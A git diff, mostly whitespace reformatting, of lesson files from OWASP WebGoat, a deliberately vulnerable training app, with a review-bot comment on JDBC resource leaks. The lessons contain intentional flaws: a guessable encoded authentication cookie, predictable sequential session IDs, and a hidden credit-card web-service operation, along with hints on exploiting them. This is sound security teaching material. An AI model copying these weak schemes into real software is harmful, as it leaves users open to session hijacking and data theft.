MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ * @@ -121,7 +119,8 @@ public class UncheckedEmail extends LessonAdapter { Message sentMessage = sendGoogleMail(to, subject, message, emailFromAddress, gId, gPass); formatMail(ec, sentMessage); - } else + } + else { sendSimulatedMail(ec, to, subject, message); } @@ -132,8 +131,7 @@ public class UncheckedEmail extends LessonAdapter { makeSuccess(s); } - } - catch (Exception e) + } catch (Exception e) { s.setMessage("Error generating " + this.getClass().getName()); e.printStackTrace(); @@ -146,7 +144,7 @@ public class UncheckedEmail extends LessonAdapter try { ec.addElement(new Center().addElement(new B().addElement("You sent the following message to: " - + Arrays.asList(sentMessage.getAllRecipients())))); + + Arrays.asList(sentMessage.getAllRecipients())))); ec.addElement(new BR()); ec.addElement(new StringElement("MAIL FROM: " + Arrays.asList(sentMessage.getReplyTo()))); ec.addElement(new BR()); @@ -154,7 +152,7 @@ public class UncheckedEmail extends LessonAdapter ec.addElement(new BR()); ec .addElement(new StringElement("Message-ID: " - + Arrays.asList(sentMessage.getHeader("Message-ID")))); + + Arrays.asList(sentMessage.getHeader("Message-ID")))); ec.addElement(new BR()); ec.addElement(new StringElement("Date: " + sentMessage.getSentDate())); ec.addElement(new BR()); 
@@ -164,8 +162,7 @@ public class UncheckedEmail extends LessonAdapter ec.addElement(new BR()); ec.addElement(new BR()); ec.addElement(new StringElement(sentMessage.getContent().toString())); - } - catch (Exception e) + } catch (Exception e) { // TODO Auto-generated catch block ec.addElement(new StringElement("Fatal error while sending message")); @@ -241,13 +238,13 @@ public class UncheckedEmail extends LessonAdapter tr = new TR(); tr.addElement(new TD().addElement( - "We value your comments. " + "To send OWASP your questions or comments " - + "regarding the WebGoat tool, please enter your " - + "comments below. The information you provide will be " - + "handled according to our Privacy Policy.").setColSpan(2)); + "We value your comments. " + "To send OWASP your questions or comments " + + "regarding the WebGoat tool, please enter your " + + "comments below. The information you provide will be " + + "handled according to our Privacy Policy.").setColSpan(2)); tr.addElement(new TD().addElement( - "OWASP
" + "9175 Guilford Rd
Suite 300
" - + "Columbia, MD. 21046").setVAlign("top")); + "OWASP
" + "9175 Guilford Rd
Suite 300
" + + "Columbia, MD. 21046").setVAlign("top")); t.addElement(tr); tr = new TR(); @@ -325,7 +322,7 @@ public class UncheckedEmail extends LessonAdapter } private Message sendGoogleMail(String recipients, String subject, String message, String from, - final String mailAccount, final String mailPassword) throws MessagingException + final String mailAccount, final String mailPassword) throws MessagingException { boolean debug = false; @@ -402,10 +399,9 @@ public class UncheckedEmail extends LessonAdapter */ public String getInstructions(WebSession s) { - String instructions = - "This form is an example of a customer support page. Using the form below try to:
" - + "1) Send a malicious script to the website admin.
" - + "2) Send a malicious script to a 'friend' from OWASP.
"; + String instructions = "This form is an example of a customer support page. Using the form below try to:
" + + "1) Send a malicious script to the website admin.
" + + "2) Send a malicious script to a 'friend' from OWASP.
"; return (instructions); } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/WSDLScanning.java b/main/project/JavaSource/org/owasp/webgoat/lessons/WSDLScanning.java index 30e96f3d2..a69192ac5 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/WSDLScanning.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/WSDLScanning.java @@ -1,9 +1,8 @@ /* - * Created on May 26, 2005 - * - * TODO To change the template for this generated file go to - * Window - Preferences - Java - Code Style - Code Templates + * Created on May 26, 2005 TODO To change the template for this generated file go to Window - + * Preferences - Java - Code Style - Code Templates */ + package org.owasp.webgoat.lessons; import java.rmi.RemoteException; @@ -13,11 +12,9 @@ import java.sql.ResultSet; import java.sql.SQLException; import java.util.ArrayList; import java.util.List; - import javax.xml.namespace.QName; import javax.xml.rpc.ParameterMode; import javax.xml.rpc.ServiceException; - import org.apache.axis.client.Call; import org.apache.axis.client.Service; import org.apache.axis.encoding.XMLType; 
@@ -33,327 +30,288 @@ import org.apache.ecs.html.Select; import org.apache.ecs.html.TD; import org.apache.ecs.html.TR; import org.apache.ecs.html.Table; - import org.owasp.webgoat.session.DatabaseUtilities; import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; import org.owasp.webgoat.session.WebgoatContext; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. 
* - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * + * * @author asmolen - * - * TODO To change the template for this generated type comment go to - * Window - Preferences - Java - Code Style - Code Templates + * + * TODO To change the template for this generated type comment go to Window - Preferences - Java - + * Code Style - Code Templates */ public class WSDLScanning extends LessonAdapter { - static boolean completed = false; + static boolean completed = false; - static boolean beenRestartedYet = false; + static boolean beenRestartedYet = false; - public final static String firstName = "getFirstName"; + public final static String firstName = "getFirstName"; - public final static String lastName = "getLastName"; + public final static String lastName = "getLastName"; - public final static String loginCount = "getLoginCount"; + public final static String loginCount = "getLoginCount"; - public final static String ccNumber = "getCreditCard"; + public final static String ccNumber = "getCreditCard"; - final static IMG CREDITS_LOGO = new IMG("images/logos/parasoft.jpg") - .setAlt("Parasoft").setBorder(0).setHspace(0).setVspace(0); + final static IMG CREDITS_LOGO = new IMG("images/logos/parasoft.jpg").setAlt("Parasoft").setBorder(0).setHspace(0) + .setVspace(0); private static 
WebgoatContext webgoatContext; - + /** - * We maintain a static reference to WebgoatContext, since this class - * is also automatically instantiated by the Axis web services module, - * which does not call setWebgoatContext() + * We maintain a static reference to WebgoatContext, since this class is also automatically + * instantiated by the Axis web services module, which does not call setWebgoatContext() * (non-Javadoc) + * * @see org.owasp.webgoat.lessons.AbstractLesson#setWebgoatContext(org.owasp.webgoat.session.WebgoatContext) */ @Override - public void setWebgoatContext(WebgoatContext webgoatContext) { + public void setWebgoatContext(WebgoatContext webgoatContext) + { WSDLScanning.webgoatContext = webgoatContext; } - + @Override - public WebgoatContext getWebgoatContext() { + public WebgoatContext getWebgoatContext() + { return WSDLScanning.webgoatContext; } - protected Category getDefaultCategory() - { - return Category.WEB_SERVICES; - } - - - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints - .add("Try connecting to the WSDL with a browser or Web Service tool."); - hints - .add("Sometimes the WSDL will define methods that are not available through a web API. " - + "Try to find operations that are in the WSDL, but not part of this API"); - hints - .add("The URL for the web service is: http://localost/WebGoat/services/WSDLScanning
" - + "The WSDL can usually be viewed by adding a ?WSDL on the end of the request."); - hints - .add("Look in the WSDL for the getCreditCard operation and insert the field in an intercepted request."); - return hints; - } - - private final static Integer DEFAULT_RANKING = new Integer(120); - - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - public String getTitle() - { - return "WSDL Scanning"; - } - - - public Object accessWGService(String serv, int port, String proc, - String parameterName, Object parameterValue) - { - String targetNamespace = "WebGoat"; - try + protected Category getDefaultCategory() { - QName serviceName = new QName(targetNamespace, serv); - QName operationName = new QName(targetNamespace, proc); - Service service = new Service(); - Call call = (Call) service.createCall(); - call.setOperationName(operationName); - call.addParameter(parameterName, serviceName, ParameterMode.INOUT); - call.setReturnType(XMLType.XSD_STRING); - call.setUsername("guest"); - call.setPassword("guest"); - call.setTargetEndpointAddress("http://localhost:" + port + "/WebGoat/services/" - + serv); - Object result = call.invoke(new Object[] { parameterValue }); - return result; + return Category.WEB_SERVICES; } - catch (RemoteException e) + + protected List getHints(WebSession s) { - e.printStackTrace(); + List hints = new ArrayList(); + hints.add("Try connecting to the WSDL with a browser or Web Service tool."); + hints.add("Sometimes the WSDL will define methods that are not available through a web API. " + + "Try to find operations that are in the WSDL, but not part of this API"); + hints.add("The URL for the web service is: http://localost/WebGoat/services/WSDLScanning
" + + "The WSDL can usually be viewed by adding a ?WSDL on the end of the request."); + hints.add("Look in the WSDL for the getCreditCard operation and insert the field in an intercepted request."); + return hints; } - catch (ServiceException e) + + private final static Integer DEFAULT_RANKING = new Integer(120); + + protected Integer getDefaultRanking() { - e.printStackTrace(); + return DEFAULT_RANKING; } - catch (Exception e) + + public String getTitle() { - e.printStackTrace(); + return "WSDL Scanning"; } - return null; - } - - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - Table t1 = new Table().setCellSpacing(0).setCellPadding(2); - - if (s.isColor()) + public Object accessWGService(String serv, int port, String proc, String parameterName, Object parameterValue) { - t1.setBorder(1); - } - TR tr = new TR(); - tr.addElement(new TD("Enter your account number: ")); - tr.addElement(new TD(new Input(Input.TEXT, "id", "101"))); - t1.addElement(tr); - - tr = new TR(); - tr.addElement(new TD("Select the fields to return: ")); - tr.addElement(new TD(new Select("field").setMultiple(true).addElement( - new Option(firstName).addElement("First Name")).addElement( - new Option(lastName).addElement("Last Name")).addElement( - new Option(loginCount).addElement("Login Count")))); - t1.addElement(tr); - - tr = new TR(); - Element b = ECSFactory.makeButton("Submit"); - tr.addElement(new TD(b).setAlign("CENTER").setColSpan(2)); - t1.addElement(tr); - - ec.addElement(t1); - - try - { - String[] fields = s.getParser().getParameterValues("field"); - int id = s.getParser().getIntParameter("id"); - - Table t = new Table().setCellSpacing(0).setCellPadding(2) - .setBorder(1); - - if (s.isColor()) - { - t.setBorder(1); - } - TR header = new TR(); - TR results = new TR(); - int port = s.getRequest().getServerPort(); - for (int i = 0; i < fields.length; i++) - { - header.addElement(new TD().addElement(fields[i])); - 
results.addElement(new TD() - .addElement((String) accessWGService("WSDLScanning", port, - fields[i], "acct_num", new Integer(id)))); - } - if (fields.length == 0) - { - s.setMessage("Please select a value to return."); - } - t.addElement(header); - t.addElement(results); - ec.addElement(new P().addElement(t)); - } - catch (Exception e) - { - - } - try - { - A a = new A("services/WSDLScanning?WSDL", "WebGoat WSDL File"); - ec - .addElement(new P() - .addElement("View the web services definition language (WSDL) to see the complete API:")); - ec.addElement(new BR()); - ec.addElement(a); - //getLessonTracker( s ).setCompleted( completed ); - - if (completed && !getLessonTracker(s).getCompleted() - && !beenRestartedYet) - { - makeSuccess(s); - beenRestartedYet = true; - } - else if (completed && !getLessonTracker(s).getCompleted() - && beenRestartedYet) - { - completed = false; - beenRestartedYet = false; - } - - // accessWGService("WSDLScanning", "getCreditCard", "acct_num", new Integer(101)); - } - catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); - } - return (ec); - } - - - public String getResults(int id, String field) - { - try - { - Connection connection = DatabaseUtilities.getConnection("guest", getWebgoatContext()); - PreparedStatement ps = connection - .prepareStatement("SELECT * FROM user_data WHERE userid = ?"); - ps.setInt(1, id); - try - { - ResultSet results = ps.executeQuery(); - if ((results != null) && (results.next() == true)) + String targetNamespace = "WebGoat"; + try { - return results.getString(field); + QName serviceName = new QName(targetNamespace, serv); + QName operationName = new QName(targetNamespace, proc); + Service service = new Service(); + Call call = (Call) service.createCall(); + call.setOperationName(operationName); + call.addParameter(parameterName, serviceName, ParameterMode.INOUT); + call.setReturnType(XMLType.XSD_STRING); + call.setUsername("guest"); + 
call.setPassword("guest"); + call.setTargetEndpointAddress("http://localhost:" + port + "/WebGoat/services/" + serv); + Object result = call.invoke(new Object[] { parameterValue }); + return result; + } catch (RemoteException e) + { + e.printStackTrace(); + } catch (ServiceException e) + { + e.printStackTrace(); + } catch (Exception e) + { + e.printStackTrace(); } - } - catch (SQLException sqle) - {} + return null; } - catch (Exception e) - {} - return null; - } - - public String getCreditCard(int id) - { - String result = getResults(id, "cc_number"); - if (result != null) + protected Element createContent(WebSession s) { - completed = true; - return result; + ElementContainer ec = new ElementContainer(); + + Table t1 = new Table().setCellSpacing(0).setCellPadding(2); + + if (s.isColor()) + { + t1.setBorder(1); + } + TR tr = new TR(); + tr.addElement(new TD("Enter your account number: ")); + tr.addElement(new TD(new Input(Input.TEXT, "id", "101"))); + t1.addElement(tr); + + tr = new TR(); + tr.addElement(new TD("Select the fields to return: ")); + tr.addElement(new TD(new Select("field").setMultiple(true).addElement( + new Option(firstName) + .addElement("First Name")) + .addElement(new Option(lastName).addElement("Last Name")) + .addElement(new Option(loginCount).addElement("Login Count")))); + t1.addElement(tr); + + tr = new TR(); + Element b = ECSFactory.makeButton("Submit"); + tr.addElement(new TD(b).setAlign("CENTER").setColSpan(2)); + t1.addElement(tr); + + ec.addElement(t1); + + try + { + String[] fields = s.getParser().getParameterValues("field"); + int id = s.getParser().getIntParameter("id"); + + Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1); + + if (s.isColor()) + { + t.setBorder(1); + } + TR header = new TR(); + TR results = new TR(); + int port = s.getRequest().getServerPort(); + for (int i = 0; i < fields.length; i++) + { + header.addElement(new TD().addElement(fields[i])); + results.addElement(new TD().addElement((String) 
accessWGService("WSDLScanning", port, fields[i], + "acct_num", new Integer(id)))); + } + if (fields.length == 0) + { + s.setMessage("Please select a value to return."); + } + t.addElement(header); + t.addElement(results); + ec.addElement(new P().addElement(t)); + } catch (Exception e) + { + + } + try + { + A a = new A("services/WSDLScanning?WSDL", "WebGoat WSDL File"); + ec.addElement(new P() + .addElement("View the web services definition language (WSDL) to see the complete API:")); + ec.addElement(new BR()); + ec.addElement(a); + // getLessonTracker( s ).setCompleted( completed ); + + if (completed && !getLessonTracker(s).getCompleted() && !beenRestartedYet) + { + makeSuccess(s); + beenRestartedYet = true; + } + else if (completed && !getLessonTracker(s).getCompleted() && beenRestartedYet) + { + completed = false; + beenRestartedYet = false; + } + + // accessWGService("WSDLScanning", "getCreditCard", "acct_num", new Integer(101)); + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } + return (ec); } - return null; - } - - public String getFirstName(int id) - { - String result = getResults(id, "first_name"); - if (result != null) + public String getResults(int id, String field) { - return result; + try + { + Connection connection = DatabaseUtilities.getConnection("guest", getWebgoatContext()); + PreparedStatement ps = connection.prepareStatement("SELECT * FROM user_data WHERE userid = ?"); + ps.setInt(1, id); + try + { + ResultSet results = ps.executeQuery(); + if ((results != null) && (results.next() == true)) { return results.getString(field); } + } catch (SQLException sqle) + { + } + } catch (Exception e) + { + } + return null; } - return null; - } - - public String getLastName(int id) - { - String result = getResults(id, "last_name"); - if (result != null) + public String getCreditCard(int id) { - return result; + String result = getResults(id, "cc_number"); + if (result != null) + { + 
completed = true; + return result; + } + return null; } - return null; - } - - public String getLoginCount(int id) - { - String result = getResults(id, "login_count"); - if (result != null) + public String getFirstName(int id) { - return result; + String result = getResults(id, "first_name"); + if (result != null) { return result; } + return null; } - return null; - } + public String getLastName(int id) + { + String result = getResults(id, "last_name"); + if (result != null) { return result; } + return null; + } - public Element getCredits() - { - return super.getCustomCredits("By Alex Smolen", CREDITS_LOGO); - } + public String getLoginCount(int id) + { + String result = getResults(id, "login_count"); + if (result != null) { return result; } + return null; + } + + public Element getCredits() + { + return super.getCustomCredits("By Alex Smolen", CREDITS_LOGO); + } } \ No newline at end of file diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/WeakAuthenticationCookie.java b/main/project/JavaSource/org/owasp/webgoat/lessons/WeakAuthenticationCookie.java index 8ca10731a..def21b08a 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/WeakAuthenticationCookie.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/WeakAuthenticationCookie.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons; import java.util.ArrayList; 
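Review bot: `getResults` on the new side never closes the `Connection`, `PreparedStatement` or `ResultSet` it opens, so each call to `getFirstName`/`getLastName`/`getLoginCount`/`getCreditCard` leaks a JDBC handle, and the two empty `catch` blocks make a database failure indistinguishable from "no such row" (both return `null`). These problems predate the reformat, but since the hunk rewrites the whole method body this is the place to fix them: release the resources in a `finally` block (try-with-resources if the build targets Java 7 or later; the `new Integer(120)` and raw `List` elsewhere in the hunk suggest it may not) and at least log the exceptions the way `accessWGService` in the same hunk already does. If `DatabaseUtilities.getConnection` hands out a shared connection rather than a fresh one, drop the `connection.close()` line below and keep the statement and result-set closes.
```java
public String getResults(int id, String field)
{
    Connection connection = null;
    PreparedStatement ps = null;
    ResultSet results = null;
    try
    {
        connection = DatabaseUtilities.getConnection("guest", getWebgoatContext());
        ps = connection.prepareStatement("SELECT * FROM user_data WHERE userid = ?");
        ps.setInt(1, id);
        results = ps.executeQuery();
        if (results.next()) { return results.getString(field); }
    } catch (SQLException sqle)
    {
        sqle.printStackTrace(); // record the failure instead of silently returning null
    } catch (Exception e)
    {
        e.printStackTrace();
    } finally
    {
        // release in reverse order of acquisition; each close is best-effort
        try { if (results != null) results.close(); } catch (SQLException ignored) { /* already tearing down */ }
        try { if (ps != null) ps.close(); } catch (SQLException ignored) { /* already tearing down */ }
        try { if (connection != null) connection.close(); } catch (SQLException ignored) { /* already tearing down */ }
    }
    return null;
}
```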
@@ -18,32 +19,31 @@ import org.apache.ecs.html.TR; import org.apache.ecs.html.Table; import org.owasp.webgoat.session.*; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ * @@ -52,8 +52,10 @@ import org.owasp.webgoat.session.*; */ public class WeakAuthenticationCookie extends LessonAdapter { - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement( - new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0)); + public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") + .addElement( + new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) + .setVspace(0)); /** * Description of the Field @@ -90,21 +92,16 @@ public class WeakAuthenticationCookie extends LessonAdapter if (cookie != null) { - if (cookie.equals(encode("webgoat12345"))) - { - return ("webgoat"); - } + if (cookie.equals(encode("webgoat12345"))) { return ("webgoat"); } - if (cookie.equals(encode("aspect12345"))) - { - return ("aspect"); - } + if (cookie.equals(encode("aspect12345"))) { return ("aspect"); } if (cookie.equals(encode("alice12345"))) { makeSuccess(s); return ("alice"); - } else + } + else { s.setMessage("Invalid cookie"); s.eatCookies(); @@ -135,7 +132,8 @@ public class WeakAuthenticationCookie extends LessonAdapter if (username.equals("webgoat") && password.equals("webgoat")) { loginID = encode("webgoat12345"); - } else if (username.equals("aspect") && password.equals("aspect")) + } + else if (username.equals("aspect") && password.equals("aspect")) { loginID = encode("aspect12345"); } 
@@ -147,7 +145,8 @@ public class WeakAuthenticationCookie extends LessonAdapter s.getResponse().addCookie(newCookie); return (username); - } else + } + else { s.setMessage("Invalid username and password entered."); } @@ -179,19 +178,12 @@ public class WeakAuthenticationCookie extends LessonAdapter { String user = checkCookie(s); - if ((user != null) && (user.length() > 0)) - { - return (makeUser(s, user, "COOKIE")); - } + if ((user != null) && (user.length() > 0)) { return (makeUser(s, user, "COOKIE")); } user = checkParams(s); - if ((user != null) && (user.length() > 0)) - { - return (makeUser(s, user, "PARAMETERS")); - } - } - catch (Exception e) + if ((user != null) && (user.length() > 0)) { return (makeUser(s, user, "PARAMETERS")); } + } catch (Exception e) { s.setMessage("Error generating " + this.getClass().getName()); e.printStackTrace(); @@ -244,10 +236,7 @@ public class WeakAuthenticationCookie extends LessonAdapter for (int i = 0; i < cookies.length; i++) { - if (cookies[i].getName().equalsIgnoreCase(AUTHCOOKIE)) - { - return (cookies[i].getValue()); - } + if (cookies[i].getName().equalsIgnoreCase(AUTHCOOKIE)) { return (cookies[i].getValue()); } } return (null); @@ -265,9 +254,9 @@ public class WeakAuthenticationCookie extends LessonAdapter hints.add("Is the AuthCookie value guessable knowing the username and password?"); hints.add("Add 'AuthCookie=********;' to the Cookie: header using " + "WebScarab."); - hints.add("After logging in as webgoat a cookie is added. 65432ubphcfx
" + - "After logging in as aspect a cookie is added. 65432udfqtb
" + - "Is there anything similar about the cookies and the login names?"); + hints.add("After logging in as webgoat a cookie is added. 65432ubphcfx
" + + "After logging in as aspect a cookie is added. 65432udfqtb
" + + "Is there anything similar about the cookies and the login names?"); return hints; } @@ -320,9 +309,9 @@ public class WeakAuthenticationCookie extends LessonAdapter } TR tr = new TR(); - tr.addElement(new TH().addElement( - "Please sign in to your account. See the OWASP admin if you do not have an account.").setColSpan(2) - .setAlign("left")); + tr.addElement(new TH() + .addElement("Please sign in to your account. See the OWASP admin if you do not have an account.") + .setColSpan(2).setAlign("left")); t.addElement(tr); tr = new TR(); diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/WeakSessionID.java b/main/project/JavaSource/org/owasp/webgoat/lessons/WeakSessionID.java index b331e3bed..e821fccbc 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/WeakSessionID.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/WeakSessionID.java @@ -1,10 +1,9 @@ + package org.owasp.webgoat.lessons; import java.util.ArrayList; import java.util.List; - import javax.servlet.http.Cookie; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
@@ -17,259 +16,249 @@ import org.apache.ecs.html.TD; import org.apache.ecs.html.TH; import org.apache.ecs.html.TR; import org.apache.ecs.html.Table; - import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.ParameterNotFoundException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. 
* - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Rogan Dawes Rogan Dawes - * @created March 30, 2005 + * + * @author Rogan Dawes Rogan Dawes + * @created March 30, 2005 */ public class WeakSessionID extends LessonAdapter { - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0)); - /** - * Description of the Field - */ - protected final static String SESSIONID = "WEAKID"; + public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") + .addElement( + new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) + .setVspace(0)); + /** + * Description of the Field + */ + protected final static String SESSIONID = "WEAKID"; - /** - * Description of the Field - */ - protected final static String PASSWORD = "Password"; + /** + * Description of the Field + */ + protected final static String PASSWORD = "Password"; - /** - * Description of the Field - */ - protected final static String USERNAME = "Username"; + /** + * Description of the Field + */ + protected final static String USERNAME = "Username"; - protected static List sessionList = new ArrayList(); + protected static List 
sessionList = new ArrayList(); - protected static long seq = Math.round(Math.random() * 10240) + 10000; + protected static long seq = Math.round(Math.random() * 10240) + 10000; - protected static long lastTime = System.currentTimeMillis(); + protected static long lastTime = System.currentTimeMillis(); - - /** - * Gets the credits attribute of the AbstractLesson object - * - * @return The credits value - */ - public Element getCredits() - { - return super.getCustomCredits("By Rogan Dawes of ", ASPECT_LOGO); - } - - - protected String newCookie(WebSession s) - { - long now = System.currentTimeMillis(); - seq++; - if (seq % 29 == 0) + /** + * Gets the credits attribute of the AbstractLesson object + * + * @return The credits value + */ + public Element getCredits() { - String target = encode(seq++, lastTime + (now - lastTime) / 2); - sessionList.add(target); - s.setMessage(target); - if (sessionList.size() > 100) - sessionList.remove(0); - } - lastTime = now; - return encode(seq, now); - } - - - private String encode(long seq, long time) - { - return new String(Long.toString(seq) + "-" + Long.toString(time)); - } - - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - try - { - String sessionid = s.getCookie(SESSIONID); - if (sessionid != null && sessionList.indexOf(sessionid) > -1) - { - return makeSuccess(s); - } - else - { - return makeLogin(s); - } - } - catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + return super.getCustomCredits("By Rogan Dawes of ", ASPECT_LOGO); } - return (null); - } - - - /** - * Gets the category attribute of the WeakAuthenticationCookie object - * - * @return The category value - */ - protected Category getDefaultCategory() - { - return Category.SESSION_MANAGEMENT; - } - - - /** - * Gets the hints attribute of the CookieScreen object - * - * 
@return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add("The server skips authentication if you send the right cookie."); - hints.add("Is the cookie value predictable? Can you see gaps where someone else has acquired a cookie?"); - hints.add("Try harder, you brute!"); - hints.add("The first part of the cookie is a sequential number, the second part is milliseconds."); - hints.add("After the 29th try, the skipped identifier is printed to your screen. Use that to login."); - return hints; - } - - private final static Integer DEFAULT_RANKING = new Integer(90); - - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - /** - * Gets the title attribute of the CookieScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Hijack a Session"); - } - - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element makeLogin(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - String weakid = s.getCookie(SESSIONID); - - if (weakid == null) + protected String newCookie(WebSession s) { - weakid = newCookie(s); - Cookie cookie = new Cookie(SESSIONID, weakid); - s.getResponse().addCookie(cookie); + long now = System.currentTimeMillis(); + seq++; + if (seq % 29 == 0) + { + String target = encode(seq++, lastTime + (now - lastTime) / 2); + sessionList.add(target); + s.setMessage(target); + if (sessionList.size() > 100) sessionList.remove(0); + } + lastTime = now; + return encode(seq, now); } - ec.addElement(new H1().addElement("Sign In ")); - Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0) - 